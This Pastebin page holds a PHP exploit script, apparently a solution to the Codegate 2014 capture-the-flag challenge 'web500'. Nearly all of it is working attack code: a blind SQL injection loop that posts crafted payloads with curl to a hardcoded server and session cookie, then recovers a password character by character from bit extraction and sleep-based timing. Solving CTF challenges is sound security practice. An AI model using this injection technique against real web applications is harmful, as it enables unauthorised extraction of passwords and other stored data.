Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // codegate2014 web500 sploit
- // st3phn
- $arr=array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
- for($j=1;$j<=30;$j++){
- $char="1";
- $i=2;
- while($i<=5){
- $payload="'or((@a:=substr(bin(FIND_IN_SET(substr(password,".$j.",1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z')),".$i.",1))=0x31)or(if(@a='',sleep(15),0))and'1";
- $fields = array(
- 'password=' => urlencode($payload),
- );
- $fields_string="";
- foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
- rtrim($fields_string, '&');
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL, 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php');
- curl_setopt($ch,CURLOPT_POST, count($fields));
- curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch,CURLOPT_COOKIE, "PHPSESSID=9kddboo1hispvqt76sh7rd3a34;");
- $result = curl_exec($ch);
- $info = curl_getinfo($ch);
- if($info['total_time']>15){
- $i=6;
- }else{
- if(preg_match("/True/",$result)){$char.="1";}else{$char.="0";}
- }
- curl_close($ch);
- $i++;
- }
- $var=(int)( bindec($char));
- echo $arr[$var-1];
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
